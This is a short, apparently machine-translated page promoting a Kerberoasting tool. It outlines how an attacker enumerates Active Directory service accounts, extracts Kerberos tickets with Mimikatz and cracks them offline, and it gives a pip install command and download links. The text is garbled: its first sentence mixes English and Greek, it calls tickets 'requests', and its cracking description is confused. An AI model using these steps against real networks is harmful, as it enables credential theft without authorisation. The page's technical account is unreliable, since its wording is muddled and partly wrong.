Kerberoasting is one method attackς που επιτρέπει σε έναν εισβολέα να σπάσει τους κωδικούς πρόσβασης των λογαριασμών υπηρεσίας στο Active Directory except σύνδεσης και χωρίς τον φόβο detections.
How it works kerberoast
- An attacker scans the Active Directory directory service for user accounts with specified SPN values, using any methods, including PowerShell and LDAP queries, scripts provided by the Kerberoast toolbox, or tools such as PowerSploit
- Once a list of target accounts is received, the attacker requests AD access to the service using SPN values
- Using Mimikatz, the attacker extracts the requests of the service in memory and stores the information in a file
- Once the credentials are stored on disk, the attacker passes them to a script password cracking which will run a password dictionary as NTLM hashes with the service requests they have extracted until the request can be successfully opened. When the request is finally opened, it will be presented to the attacker in clear text.
Installation
pip3 install kerberoast
Application snapshots
Video guide
You can download the application from here.